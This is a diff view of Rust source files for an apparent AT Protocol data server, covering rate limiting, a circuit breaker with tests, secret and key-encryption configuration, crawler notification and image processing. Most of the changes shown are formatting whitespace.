async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool;
103
}
104
+
105
#[derive(Clone)]
106
pub struct RedisRateLimiter {
107
conn: redis::aio::ConnectionManager,
108
}
109
+
110
impl RedisRateLimiter {
111
pub fn new(conn: redis::aio::ConnectionManager) -> Self {
112
Self { conn }
113
}
114
}
115
+
116
#[async_trait]
117
impl DistributedRateLimiter for RedisRateLimiter {
118
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool {
···
140
count <= limit as i64
141
}
142
}
143
+
144
pub struct NoOpRateLimiter;
145
+
146
#[async_trait]
147
impl DistributedRateLimiter for NoOpRateLimiter {
148
async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool {
149
true
150
}
151
}
152
+
153
pub enum CacheBackend {
154
Valkey(ValkeyCache),
155
NoOp,
156
}
157
+
158
impl CacheBackend {
159
pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> {
160
match self {
···
165
}
166
}
167
}
168
+
169
#[async_trait]
170
impl Cache for CacheBackend {
171
async fn get(&self, key: &str) -> Option<String> {
···
174
CacheBackend::NoOp => None,
175
}
176
}
177
+
178
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
179
match self {
180
CacheBackend::Valkey(c) => c.set(key, value, ttl).await,
181
CacheBackend::NoOp => Ok(()),
182
}
183
}
184
+
185
async fn delete(&self, key: &str) -> Result<(), CacheError> {
186
match self {
187
CacheBackend::Valkey(c) => c.delete(key).await,
···
189
}
190
}
191
}
192
+
193
pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) {
194
match std::env::var("VALKEY_URL") {
195
Ok(url) => match ValkeyCache::new(&url).await {
+45
src/circuit_breaker.rs
+45
src/circuit_breaker.rs
···
2
use std::sync::Arc;
3
use std::time::Duration;
4
use tokio::sync::RwLock;
5
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
6
pub enum CircuitState {
7
Closed,
8
Open,
9
HalfOpen,
10
}
11
pub struct CircuitBreaker {
12
name: String,
13
failure_threshold: u32,
···
18
success_count: AtomicU32,
19
last_failure_time: AtomicU64,
20
}
21
impl CircuitBreaker {
22
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
23
Self {
···
31
last_failure_time: AtomicU64::new(0),
32
}
33
}
34
pub async fn can_execute(&self) -> bool {
35
let state = self.state.read().await;
36
match *state {
37
CircuitState::Closed => true,
38
CircuitState::Open => {
···
41
.duration_since(std::time::UNIX_EPOCH)
42
.unwrap()
43
.as_secs();
44
if now - last_failure >= self.timeout.as_secs() {
45
drop(state);
46
let mut state = self.state.write().await;
···
56
CircuitState::HalfOpen => true,
57
}
58
}
59
pub async fn record_success(&self) {
60
let state = *self.state.read().await;
61
match state {
62
CircuitState::Closed => {
63
self.failure_count.store(0, Ordering::SeqCst);
···
75
CircuitState::Open => {}
76
}
77
}
78
pub async fn record_failure(&self) {
79
let state = *self.state.read().await;
80
match state {
81
CircuitState::Closed => {
82
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
···
110
CircuitState::Open => {}
111
}
112
}
113
pub async fn state(&self) -> CircuitState {
114
*self.state.read().await
115
}
116
pub fn name(&self) -> &str {
117
&self.name
118
}
119
}
120
#[derive(Clone)]
121
pub struct CircuitBreakers {
122
pub plc_directory: Arc<CircuitBreaker>,
123
pub relay_notification: Arc<CircuitBreaker>,
124
}
125
impl Default for CircuitBreakers {
126
fn default() -> Self {
127
Self::new()
128
}
129
}
130
impl CircuitBreakers {
131
pub fn new() -> Self {
132
Self {
···
135
}
136
}
137
}
138
#[derive(Debug)]
139
pub struct CircuitOpenError {
140
pub circuit_name: String,
141
}
142
impl std::fmt::Display for CircuitOpenError {
143
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
144
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
145
}
146
}
147
impl std::error::Error for CircuitOpenError {}
148
pub async fn with_circuit_breaker<T, E, F, Fut>(
149
circuit: &CircuitBreaker,
150
operation: F,
···
158
circuit_name: circuit.name().to_string(),
159
}));
160
}
161
match operation().await {
162
Ok(result) => {
163
circuit.record_success().await;
···
169
}
170
}
171
}
172
#[derive(Debug)]
173
pub enum CircuitBreakerError<E> {
174
CircuitOpen(CircuitOpenError),
175
OperationFailed(E),
176
}
177
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
178
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
179
match self {
···
182
}
183
}
184
}
185
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
186
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
187
match self {
···
190
}
191
}
192
}
193
#[cfg(test)]
194
mod tests {
195
use super::*;
196
#[tokio::test]
197
async fn test_circuit_breaker_starts_closed() {
198
let cb = CircuitBreaker::new("test", 3, 2, 10);
199
assert_eq!(cb.state().await, CircuitState::Closed);
200
assert!(cb.can_execute().await);
201
}
202
#[tokio::test]
203
async fn test_circuit_breaker_opens_after_failures() {
204
let cb = CircuitBreaker::new("test", 3, 2, 10);
205
cb.record_failure().await;
206
assert_eq!(cb.state().await, CircuitState::Closed);
207
cb.record_failure().await;
208
assert_eq!(cb.state().await, CircuitState::Closed);
209
cb.record_failure().await;
210
assert_eq!(cb.state().await, CircuitState::Open);
211
assert!(!cb.can_execute().await);
212
}
213
#[tokio::test]
214
async fn test_circuit_breaker_success_resets_failures() {
215
let cb = CircuitBreaker::new("test", 3, 2, 10);
216
cb.record_failure().await;
217
cb.record_failure().await;
218
cb.record_success().await;
219
cb.record_failure().await;
220
cb.record_failure().await;
221
assert_eq!(cb.state().await, CircuitState::Closed);
222
cb.record_failure().await;
223
assert_eq!(cb.state().await, CircuitState::Open);
224
}
225
#[tokio::test]
226
async fn test_circuit_breaker_half_open_closes_after_successes() {
227
let cb = CircuitBreaker::new("test", 3, 2, 0);
228
for _ in 0..3 {
229
cb.record_failure().await;
230
}
231
assert_eq!(cb.state().await, CircuitState::Open);
232
tokio::time::sleep(Duration::from_millis(100)).await;
233
assert!(cb.can_execute().await);
234
assert_eq!(cb.state().await, CircuitState::HalfOpen);
235
cb.record_success().await;
236
assert_eq!(cb.state().await, CircuitState::HalfOpen);
237
cb.record_success().await;
238
assert_eq!(cb.state().await, CircuitState::Closed);
239
}
240
#[tokio::test]
241
async fn test_circuit_breaker_half_open_reopens_on_failure() {
242
let cb = CircuitBreaker::new("test", 3, 2, 0);
243
for _ in 0..3 {
244
cb.record_failure().await;
245
}
246
tokio::time::sleep(Duration::from_millis(100)).await;
247
cb.can_execute().await;
248
cb.record_failure().await;
249
assert_eq!(cb.state().await, CircuitState::Open);
250
}
251
#[tokio::test]
252
async fn test_with_circuit_breaker_helper() {
253
let cb = CircuitBreaker::new("test", 3, 2, 10);
254
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
255
with_circuit_breaker(&cb, || async { Ok(42) }).await;
256
assert!(result.is_ok());
257
assert_eq!(result.unwrap(), 42);
258
let result: Result<i32, CircuitBreakerError<&str>> =
259
with_circuit_breaker(&cb, || async { Err("error") }).await;
260
assert!(result.is_err());
···
2
use std::sync::Arc;
3
use std::time::Duration;
4
use tokio::sync::RwLock;
5
+
6
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
7
pub enum CircuitState {
8
Closed,
9
Open,
10
HalfOpen,
11
}
12
+
13
pub struct CircuitBreaker {
14
name: String,
15
failure_threshold: u32,
···
20
success_count: AtomicU32,
21
last_failure_time: AtomicU64,
22
}
23
+
24
impl CircuitBreaker {
25
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
26
Self {
···
34
last_failure_time: AtomicU64::new(0),
35
}
36
}
37
+
38
pub async fn can_execute(&self) -> bool {
39
let state = self.state.read().await;
40
+
41
match *state {
42
CircuitState::Closed => true,
43
CircuitState::Open => {
···
46
.duration_since(std::time::UNIX_EPOCH)
47
.unwrap()
48
.as_secs();
49
+
50
if now - last_failure >= self.timeout.as_secs() {
51
drop(state);
52
let mut state = self.state.write().await;
···
62
CircuitState::HalfOpen => true,
63
}
64
}
65
+
66
pub async fn record_success(&self) {
67
let state = *self.state.read().await;
68
+
69
match state {
70
CircuitState::Closed => {
71
self.failure_count.store(0, Ordering::SeqCst);
···
83
CircuitState::Open => {}
84
}
85
}
86
+
87
pub async fn record_failure(&self) {
88
let state = *self.state.read().await;
89
+
90
match state {
91
CircuitState::Closed => {
92
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
···
120
CircuitState::Open => {}
121
}
122
}
123
+
124
pub async fn state(&self) -> CircuitState {
125
*self.state.read().await
126
}
127
+
128
pub fn name(&self) -> &str {
129
&self.name
130
}
131
}
132
+
133
#[derive(Clone)]
134
pub struct CircuitBreakers {
135
pub plc_directory: Arc<CircuitBreaker>,
136
pub relay_notification: Arc<CircuitBreaker>,
137
}
138
+
139
impl Default for CircuitBreakers {
140
fn default() -> Self {
141
Self::new()
142
}
143
}
144
+
145
impl CircuitBreakers {
146
pub fn new() -> Self {
147
Self {
···
150
}
151
}
152
}
153
+
154
#[derive(Debug)]
155
pub struct CircuitOpenError {
156
pub circuit_name: String,
157
}
158
+
159
impl std::fmt::Display for CircuitOpenError {
160
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
161
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
162
}
163
}
164
+
165
impl std::error::Error for CircuitOpenError {}
166
+
167
pub async fn with_circuit_breaker<T, E, F, Fut>(
168
circuit: &CircuitBreaker,
169
operation: F,
···
177
circuit_name: circuit.name().to_string(),
178
}));
179
}
180
+
181
match operation().await {
182
Ok(result) => {
183
circuit.record_success().await;
···
189
}
190
}
191
}
192
+
193
#[derive(Debug)]
194
pub enum CircuitBreakerError<E> {
195
CircuitOpen(CircuitOpenError),
196
OperationFailed(E),
197
}
198
+
199
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
200
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
201
match self {
···
204
}
205
}
206
}
207
+
208
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
209
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
210
match self {
···
213
}
214
}
215
}
216
+
217
#[cfg(test)]
218
mod tests {
219
use super::*;
220
+
221
#[tokio::test]
222
async fn test_circuit_breaker_starts_closed() {
223
let cb = CircuitBreaker::new("test", 3, 2, 10);
224
assert_eq!(cb.state().await, CircuitState::Closed);
225
assert!(cb.can_execute().await);
226
}
227
+
228
#[tokio::test]
229
async fn test_circuit_breaker_opens_after_failures() {
230
let cb = CircuitBreaker::new("test", 3, 2, 10);
231
+
232
cb.record_failure().await;
233
assert_eq!(cb.state().await, CircuitState::Closed);
234
+
235
cb.record_failure().await;
236
assert_eq!(cb.state().await, CircuitState::Closed);
237
+
238
cb.record_failure().await;
239
assert_eq!(cb.state().await, CircuitState::Open);
240
assert!(!cb.can_execute().await);
241
}
242
+
243
#[tokio::test]
244
async fn test_circuit_breaker_success_resets_failures() {
245
let cb = CircuitBreaker::new("test", 3, 2, 10);
246
+
247
cb.record_failure().await;
248
cb.record_failure().await;
249
cb.record_success().await;
250
+
251
cb.record_failure().await;
252
cb.record_failure().await;
253
assert_eq!(cb.state().await, CircuitState::Closed);
254
+
255
cb.record_failure().await;
256
assert_eq!(cb.state().await, CircuitState::Open);
257
}
258
+
259
#[tokio::test]
260
async fn test_circuit_breaker_half_open_closes_after_successes() {
261
let cb = CircuitBreaker::new("test", 3, 2, 0);
262
+
263
for _ in 0..3 {
264
cb.record_failure().await;
265
}
266
assert_eq!(cb.state().await, CircuitState::Open);
267
+
268
tokio::time::sleep(Duration::from_millis(100)).await;
269
assert!(cb.can_execute().await);
270
assert_eq!(cb.state().await, CircuitState::HalfOpen);
271
+
272
cb.record_success().await;
273
assert_eq!(cb.state().await, CircuitState::HalfOpen);
274
+
275
cb.record_success().await;
276
assert_eq!(cb.state().await, CircuitState::Closed);
277
}
278
+
279
#[tokio::test]
280
async fn test_circuit_breaker_half_open_reopens_on_failure() {
281
let cb = CircuitBreaker::new("test", 3, 2, 0);
282
+
283
for _ in 0..3 {
284
cb.record_failure().await;
285
}
286
+
287
tokio::time::sleep(Duration::from_millis(100)).await;
288
cb.can_execute().await;
289
+
290
cb.record_failure().await;
291
assert_eq!(cb.state().await, CircuitState::Open);
292
}
293
+
294
#[tokio::test]
295
async fn test_with_circuit_breaker_helper() {
296
let cb = CircuitBreaker::new("test", 3, 2, 10);
297
+
298
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
299
with_circuit_breaker(&cb, || async { Ok(42) }).await;
300
assert!(result.is_ok());
301
assert_eq!(result.unwrap(), 42);
302
+
303
let result: Result<i32, CircuitBreakerError<&str>> =
304
with_circuit_breaker(&cb, || async { Err("error") }).await;
305
assert!(result.is_err());
+32
src/config.rs
+32
src/config.rs
···
8
use p256::ecdsa::SigningKey;
9
use sha2::{Digest, Sha256};
10
use std::sync::OnceLock;
11
static CONFIG: OnceLock<AuthConfig> = OnceLock::new();
12
pub const ENCRYPTION_VERSION: i32 = 1;
13
pub struct AuthConfig {
14
jwt_secret: String,
15
dpop_secret: String,
···
20
pub signing_key_y: String,
21
key_encryption_key: [u8; 32],
22
}
23
impl AuthConfig {
24
pub fn init() -> &'static Self {
25
CONFIG.get_or_init(|| {
···
33
);
34
}
35
});
36
let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| {
37
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
38
"test-dpop-secret-not-for-production".to_string()
···
43
);
44
}
45
});
46
if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
47
panic!("JWT_SECRET must be at least 32 characters");
48
}
49
if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
50
panic!("DPOP_SECRET must be at least 32 characters");
51
}
52
let mut hasher = Sha256::new();
53
hasher.update(b"oauth-signing-key-derivation:");
54
hasher.update(jwt_secret.as_bytes());
55
let seed = hasher.finalize();
56
let signing_key = SigningKey::from_slice(&seed)
57
.unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e));
58
let verifying_key = signing_key.verifying_key();
59
let point = verifying_key.to_encoded_point(false);
60
let signing_key_x = URL_SAFE_NO_PAD.encode(
61
point.x().expect("EC point missing X coordinate - this should never happen")
62
);
63
let signing_key_y = URL_SAFE_NO_PAD.encode(
64
point.y().expect("EC point missing Y coordinate - this should never happen")
65
);
66
let mut kid_hasher = Sha256::new();
67
kid_hasher.update(signing_key_x.as_bytes());
68
kid_hasher.update(signing_key_y.as_bytes());
69
let kid_hash = kid_hasher.finalize();
70
let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]);
71
let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| {
72
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
73
"test-master-key-not-for-production".to_string()
···
78
);
79
}
80
});
81
if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
82
panic!("MASTER_KEY must be at least 32 characters");
83
}
84
let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes());
85
let mut key_encryption_key = [0u8; 32];
86
hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key)
87
.expect("HKDF expansion failed");
88
AuthConfig {
89
jwt_secret,
90
dpop_secret,
···
96
}
97
})
98
}
99
pub fn get() -> &'static Self {
100
CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first")
101
}
102
pub fn jwt_secret(&self) -> &str {
103
&self.jwt_secret
104
}
105
pub fn dpop_secret(&self) -> &str {
106
&self.dpop_secret
107
}
108
pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> {
109
use rand::RngCore;
110
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
111
.map_err(|e| format!("Failed to create cipher: {}", e))?;
112
let mut nonce_bytes = [0u8; 12];
113
rand::thread_rng().fill_bytes(&mut nonce_bytes);
114
#[allow(deprecated)]
115
let nonce = Nonce::from_slice(&nonce_bytes);
116
let ciphertext = cipher
117
.encrypt(nonce, plaintext)
118
.map_err(|e| format!("Encryption failed: {}", e))?;
119
let mut result = Vec::with_capacity(12 + ciphertext.len());
120
result.extend_from_slice(&nonce_bytes);
121
result.extend_from_slice(&ciphertext);
122
Ok(result)
123
}
124
pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> {
125
if encrypted.len() < 12 {
126
return Err("Encrypted data too short".to_string());
127
}
128
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
129
.map_err(|e| format!("Failed to create cipher: {}", e))?;
130
#[allow(deprecated)]
131
let nonce = Nonce::from_slice(&encrypted[..12]);
132
let ciphertext = &encrypted[12..];
133
cipher
134
.decrypt(nonce, ciphertext)
135
.map_err(|e| format!("Decryption failed: {}", e))
136
}
137
}
138
pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> {
139
AuthConfig::get().encrypt_user_key(plaintext)
140
}
141
pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> {
142
match version.unwrap_or(0) {
143
0 => Ok(encrypted.to_vec()),
···
8
use p256::ecdsa::SigningKey;
9
use sha2::{Digest, Sha256};
10
use std::sync::OnceLock;
11
+
12
static CONFIG: OnceLock<AuthConfig> = OnceLock::new();
13
+
14
pub const ENCRYPTION_VERSION: i32 = 1;
15
+
16
pub struct AuthConfig {
17
jwt_secret: String,
18
dpop_secret: String,
···
23
pub signing_key_y: String,
24
key_encryption_key: [u8; 32],
25
}
26
+
27
impl AuthConfig {
28
pub fn init() -> &'static Self {
29
CONFIG.get_or_init(|| {
···
37
);
38
}
39
});
40
+
41
let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| {
42
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
43
"test-dpop-secret-not-for-production".to_string()
···
48
);
49
}
50
});
51
+
52
if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
53
panic!("JWT_SECRET must be at least 32 characters");
54
}
55
+
56
if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
57
panic!("DPOP_SECRET must be at least 32 characters");
58
}
59
+
60
let mut hasher = Sha256::new();
61
hasher.update(b"oauth-signing-key-derivation:");
62
hasher.update(jwt_secret.as_bytes());
63
let seed = hasher.finalize();
64
+
65
let signing_key = SigningKey::from_slice(&seed)
66
.unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e));
67
+
68
let verifying_key = signing_key.verifying_key();
69
let point = verifying_key.to_encoded_point(false);
70
+
71
let signing_key_x = URL_SAFE_NO_PAD.encode(
72
point.x().expect("EC point missing X coordinate - this should never happen")
73
);
74
let signing_key_y = URL_SAFE_NO_PAD.encode(
75
point.y().expect("EC point missing Y coordinate - this should never happen")
76
);
77
+
78
let mut kid_hasher = Sha256::new();
79
kid_hasher.update(signing_key_x.as_bytes());
80
kid_hasher.update(signing_key_y.as_bytes());
81
let kid_hash = kid_hasher.finalize();
82
let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]);
83
+
84
let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| {
85
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
86
"test-master-key-not-for-production".to_string()
···
91
);
92
}
93
});
94
+
95
if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
96
panic!("MASTER_KEY must be at least 32 characters");
97
}
98
+
99
let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes());
100
let mut key_encryption_key = [0u8; 32];
101
hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key)
102
.expect("HKDF expansion failed");
103
+
104
AuthConfig {
105
jwt_secret,
106
dpop_secret,
···
112
}
113
})
114
}
115
+
116
pub fn get() -> &'static Self {
117
CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first")
118
}
119
+
120
pub fn jwt_secret(&self) -> &str {
121
&self.jwt_secret
122
}
123
+
124
pub fn dpop_secret(&self) -> &str {
125
&self.dpop_secret
126
}
127
+
128
pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> {
129
use rand::RngCore;
130
+
131
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
132
.map_err(|e| format!("Failed to create cipher: {}", e))?;
133
+
134
let mut nonce_bytes = [0u8; 12];
135
rand::thread_rng().fill_bytes(&mut nonce_bytes);
136
+
137
#[allow(deprecated)]
138
let nonce = Nonce::from_slice(&nonce_bytes);
139
+
140
let ciphertext = cipher
141
.encrypt(nonce, plaintext)
142
.map_err(|e| format!("Encryption failed: {}", e))?;
143
+
144
let mut result = Vec::with_capacity(12 + ciphertext.len());
145
result.extend_from_slice(&nonce_bytes);
146
result.extend_from_slice(&ciphertext);
147
+
148
Ok(result)
149
}
150
+
151
pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> {
152
if encrypted.len() < 12 {
153
return Err("Encrypted data too short".to_string());
154
}
155
+
156
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
157
.map_err(|e| format!("Failed to create cipher: {}", e))?;
158
+
159
#[allow(deprecated)]
160
let nonce = Nonce::from_slice(&encrypted[..12]);
161
let ciphertext = &encrypted[12..];
162
+
163
cipher
164
.decrypt(nonce, ciphertext)
165
.map_err(|e| format!("Decryption failed: {}", e))
166
}
167
}
168
+
169
pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> {
170
AuthConfig::get().encrypt_user_key(plaintext)
171
}
172
+
173
pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> {
174
match version.unwrap_or(0) {
175
0 => Ok(encrypted.to_vec()),
+19
src/crawlers.rs
+19
src/crawlers.rs
···
6
use std::time::Duration;
7
use tokio::sync::{broadcast, watch};
8
use tracing::{debug, error, info, warn};
9
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
10
pub struct Crawlers {
11
hostname: String,
12
crawler_urls: Vec<String>,
···
14
last_notified: AtomicU64,
15
circuit_breaker: Option<Arc<CircuitBreaker>>,
16
}
17
impl Crawlers {
18
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
19
Self {
···
27
circuit_breaker: None,
28
}
29
}
30
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
31
self.circuit_breaker = Some(circuit_breaker);
32
self
33
}
34
pub fn from_env() -> Option<Self> {
35
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
36
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
37
.unwrap_or_default()
38
.split(',')
39
.filter(|s| !s.is_empty())
40
.map(|s| s.trim().to_string())
41
.collect();
42
if crawler_urls.is_empty() {
43
return None;
44
}
45
Some(Self::new(hostname, crawler_urls))
46
}
47
fn should_notify(&self) -> bool {
48
let now = std::time::SystemTime::now()
49
.duration_since(std::time::UNIX_EPOCH)
50
.unwrap_or_default()
51
.as_secs();
52
let last = self.last_notified.load(Ordering::Relaxed);
53
now - last >= NOTIFY_THRESHOLD_SECS
54
}
55
fn mark_notified(&self) {
56
let now = std::time::SystemTime::now()
57
.duration_since(std::time::UNIX_EPOCH)
58
.unwrap_or_default()
59
.as_secs();
60
self.last_notified.store(now, Ordering::Relaxed);
61
}
62
pub async fn notify_of_update(&self) {
63
if !self.should_notify() {
64
debug!("Skipping crawler notification due to debounce");
65
return;
66
}
67
if let Some(cb) = &self.circuit_breaker {
68
if !cb.can_execute().await {
69
debug!("Skipping crawler notification due to circuit breaker open");
70
return;
71
}
72
}
73
self.mark_notified();
74
let circuit_breaker = self.circuit_breaker.clone();
75
for crawler_url in &self.crawler_urls {
76
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
77
let hostname = self.hostname.clone();
78
let client = self.http_client.clone();
79
let cb = circuit_breaker.clone();
80
tokio::spawn(async move {
81
match client
82
.post(&url)
···
116
}
117
}
118
}
119
pub async fn start_crawlers_service(
120
crawlers: Arc<Crawlers>,
121
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
···
127
crawlers = ?crawlers.crawler_urls,
128
"Starting crawlers notification service"
129
);
130
loop {
131
tokio::select! {
132
result = firehose_rx.recv() => {
···
6
use std::time::Duration;
7
use tokio::sync::{broadcast, watch};
8
use tracing::{debug, error, info, warn};
9
+
10
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
11
+
12
pub struct Crawlers {
13
hostname: String,
14
crawler_urls: Vec<String>,
···
16
last_notified: AtomicU64,
17
circuit_breaker: Option<Arc<CircuitBreaker>>,
18
}
19
+
20
impl Crawlers {
21
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
22
Self {
···
30
circuit_breaker: None,
31
}
32
}
33
+
34
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
35
self.circuit_breaker = Some(circuit_breaker);
36
self
37
}
38
+
39
pub fn from_env() -> Option<Self> {
40
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
41
+
42
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
43
.unwrap_or_default()
44
.split(',')
45
.filter(|s| !s.is_empty())
46
.map(|s| s.trim().to_string())
47
.collect();
48
+
49
if crawler_urls.is_empty() {
50
return None;
51
}
52
+
53
Some(Self::new(hostname, crawler_urls))
54
}
55
+
56
fn should_notify(&self) -> bool {
57
let now = std::time::SystemTime::now()
58
.duration_since(std::time::UNIX_EPOCH)
59
.unwrap_or_default()
60
.as_secs();
61
+
62
let last = self.last_notified.load(Ordering::Relaxed);
63
now - last >= NOTIFY_THRESHOLD_SECS
64
}
65
+
66
fn mark_notified(&self) {
67
let now = std::time::SystemTime::now()
68
.duration_since(std::time::UNIX_EPOCH)
69
.unwrap_or_default()
70
.as_secs();
71
+
72
self.last_notified.store(now, Ordering::Relaxed);
73
}
74
+
75
pub async fn notify_of_update(&self) {
76
if !self.should_notify() {
77
debug!("Skipping crawler notification due to debounce");
78
return;
79
}
80
+
81
if let Some(cb) = &self.circuit_breaker {
82
if !cb.can_execute().await {
83
debug!("Skipping crawler notification due to circuit breaker open");
84
return;
85
}
86
}
87
+
88
self.mark_notified();
89
let circuit_breaker = self.circuit_breaker.clone();
90
+
91
for crawler_url in &self.crawler_urls {
92
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
93
let hostname = self.hostname.clone();
94
let client = self.http_client.clone();
95
let cb = circuit_breaker.clone();
96
+
97
tokio::spawn(async move {
98
match client
99
.post(&url)
···
133
}
134
}
135
}
136
+
137
pub async fn start_crawlers_service(
138
crawlers: Arc<Crawlers>,
139
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
···
145
crawlers = ?crawlers.crawler_urls,
146
"Starting crawlers notification service"
147
);
148
+
149
loop {
150
tokio::select! {
151
result = firehose_rx.recv() => {
+28
-1
src/image/mod.rs
+28
-1
src/image/mod.rs
···
1
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
2
use std::io::Cursor;
3
pub const THUMB_SIZE_FEED: u32 = 200;
4
pub const THUMB_SIZE_FULL: u32 = 1000;
5
#[derive(Debug, Clone)]
6
pub struct ProcessedImage {
7
pub data: Vec<u8>,
···
9
pub width: u32,
10
pub height: u32,
11
}
12
#[derive(Debug, Clone)]
13
pub struct ImageProcessingResult {
14
pub original: ProcessedImage,
15
pub thumbnail_feed: Option<ProcessedImage>,
16
pub thumbnail_full: Option<ProcessedImage>,
17
}
18
#[derive(Debug, thiserror::Error)]
19
pub enum ImageError {
20
#[error("Failed to decode image: {0}")]
···
32
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
33
FileTooLarge { size: usize, max_size: usize },
34
}
35
-
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
36
pub struct ImageProcessor {
37
max_dimension: u32,
38
max_file_size: usize,
39
output_format: OutputFormat,
40
generate_thumbnails: bool,
41
}
42
#[derive(Debug, Clone, Copy)]
43
pub enum OutputFormat {
44
WebP,
···
46
Png,
47
Original,
48
}
49
impl Default for ImageProcessor {
50
fn default() -> Self {
51
Self {
···
56
}
57
}
58
}
59
impl ImageProcessor {
60
pub fn new() -> Self {
61
Self::default()
62
}
63
pub fn with_max_dimension(mut self, max: u32) -> Self {
64
self.max_dimension = max;
65
self
66
}
67
pub fn with_max_file_size(mut self, max: usize) -> Self {
68
self.max_file_size = max;
69
self
70
}
71
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
72
self.output_format = format;
73
self
74
}
75
pub fn with_thumbnails(mut self, generate: bool) -> Self {
76
self.generate_thumbnails = generate;
77
self
78
}
79
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
80
if data.len() > self.max_file_size {
81
return Err(ImageError::FileTooLarge {
···
109
thumbnail_full,
110
})
111
}
112
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
113
match mime_type.to_lowercase().as_str() {
114
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
···
124
}
125
}
126
}
127
